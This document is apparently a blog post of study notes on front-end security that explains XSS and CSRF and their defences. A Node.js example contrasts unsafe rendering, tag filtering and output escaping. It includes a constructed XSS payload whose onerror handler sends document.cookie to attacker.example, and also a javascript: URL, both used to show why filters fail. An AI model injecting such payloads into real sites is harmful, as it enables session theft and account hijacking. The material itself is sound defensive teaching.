Front-end security issues: notes

Cross-site scripting (XSS for short): refers to an attacker taking advantage of a website that fails to escape, or only insufficiently filters, data submitted by users, and embedding code in the web page through that data. When other users visit the page, the embedded code runs in their browsers. In this way user information is stolen, actions are performed under the victim's identity, or malicious code is delivered to visitors.

The harm caused by XSS attacks: stealing user accounts of all kinds, gaining control of corporate data, stealing business materials, making illegal transfers, forcibly sending e-mails, planting malicious code on websites, and controlling victims' machines to launch attacks on other websites.

Main cause: too much trust in the data provided by the client!

Solution: do not trust any data submitted by the client. Validate (filter) data submitted by the client before it is used in any further operation, and, most importantly, escape it for the context in which it is written into the page (HTML text, attribute value, URL, JavaScript). Filtering the input alone is not a reliable fix, because an attacker can usually find a tag, attribute or encoding that the filter does not recognize.

Attack method: the application needs the data the client submits, but an attacker abuses the website's trust in that data and inserts special characters and JavaScript code into it. Because the site writes the data into the page without escaping it, the data becomes part of the application's code. Very dangerous!
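The following is an added example, not code from the original notes, that renders the same page fragment with and without output encoding to show how client data becomes page code. It runs under Node.js and simulates server-side templating with plain strings, so no DOM is needed; the attacker payload, the attacker.example and site.example hostnames, and all function names are constructed for the example.

```javascript
// Added example, not code from the original notes: the same page fragment rendered
// with and without output encoding, to show how client data becomes page code.
// Runs under Node.js; server-side templating is simulated with plain strings,
// so no DOM is required. The attacker payload and hostnames are constructed.

// Constructed attacker input, as it might arrive in a query string or form field.
// It carries no <script> tag, so a tag-blacklist filter will not catch it.
const MALICIOUS_NAME =
  '<img src=x onerror="fetch(\'https://attacker.example/?c=\'+document.cookie)">';

// Vulnerable: the server trusts the client value and concatenates it into HTML.
function renderGreetingUnsafe(name) {
  return `<p>Hello, ${name}!</p>`;
}

// Output encoding for the HTML text and quoted-attribute contexts.
const HTML_ESCAPES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#x27;' };
function escapeHtml(value) {
  return String(value).replace(/[&<>"']/g, (ch) => HTML_ESCAPES[ch]);
}

// Hardened: same template, but the untrusted value is encoded for the context it lands in.
function renderGreetingSafe(name) {
  return `<p>Hello, ${escapeHtml(name)}!</p>`;
}

// A typical "filter the input" attempt: strip <script> blocks. It is bypassed by the
// payload above, which uses an event-handler attribute instead of a script tag.
function stripScriptTags(value) {
  return String(value).replace(/<script\b[^>]*>[\s\S]*?<\/script>/gi, '');
}

// Escaping is context-specific: inside href="..." an HTML-escaped "javascript:" URL
// still executes. URL-valued input must be validated by scheme instead.
function safeHref(url) {
  try {
    const u = new URL(String(url), 'https://site.example/'); // constructed base origin
    return u.protocol === 'http:' || u.protocol === 'https:' ? u.href : '#';
  } catch (e) {
    return '#';
  }
}

// Demo-only check: does the rendered fragment contain any tag the template did not emit?
function containsInjectedMarkup(html) {
  const tags = html.match(/<[a-zA-Z][^>]*>/g) || [];
  return tags.some((t) => t !== '<p>');
}

function demo() {
  return {
    unsafe: containsInjectedMarkup(renderGreetingUnsafe(MALICIOUS_NAME)),                        // true
    filteredOnly: containsInjectedMarkup(renderGreetingUnsafe(stripScriptTags(MALICIOUS_NAME))), // true
    escaped: containsInjectedMarkup(renderGreetingSafe(MALICIOUS_NAME)),                         // false
    jsHref: safeHref('javascript:alert(document.cookie)'),                                       // '#'
  };
}
```

The point of the three `demo()` results is that the filter and the unfiltered path produce the same injected tag, while the escaped path never produces a tag at all; `safeHref` is there because encoding for one context (HTML) does not protect a value that lands in another (a URL).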

Cross-site request forgery (CSRF for short): an attack that tricks a user's browser into performing operations the user did not intend on a web application the user is already logged in to.

Compared with XSS: CSRF exploits the website's trust in the user's browser (the browser attaches the site's cookies to every request to that site, whichever page initiated it); XSS exploits the user's trust in the website (the injected script runs in the page with the site's own origin).

The principle of a CSRF attack:

1: The client logs in to website A with an account and password;

2: Website A verifies the account and password and, if successful, generates a sessionID and returns it to the client, which stores it in the browser (as a cookie);

3: The client opens a new tab and visits website B;

4: Website B automatically triggers a request from the client to website A (for example, website B contains a link, an image or a hidden form that points at website A);

5: The client's browser sends that request to website A, and because it is a request to A, it automatically attaches the legitimate sessionID cookie;

6: Website A only checks whether the sessionID is valid, and if it is, executes the requested operation, even though the user never intended it!

A CSRF attack is only possible under these conditions:

1: The client has logged in to the target website, and the cookie credential is stored in the browser;

2: The cookie has not been cleared (the session is still valid), and the client, in the same browser, opens a tab to visit the other website.

The defence follows from this: the server must not rely on the cookie alone. A per-session anti-CSRF token that the page embeds in its own forms (and that the browser does not send automatically) and the SameSite attribute on the session cookie both break step 5.


XSS learning link: https://www.cnblogs.com/applelife/p/10477583.html

CSRF learning link: https://www.cnblogs.com/applelife/p/10477600.html


Source: www.cnblogs.com/pengxiangchong/p/12719944.html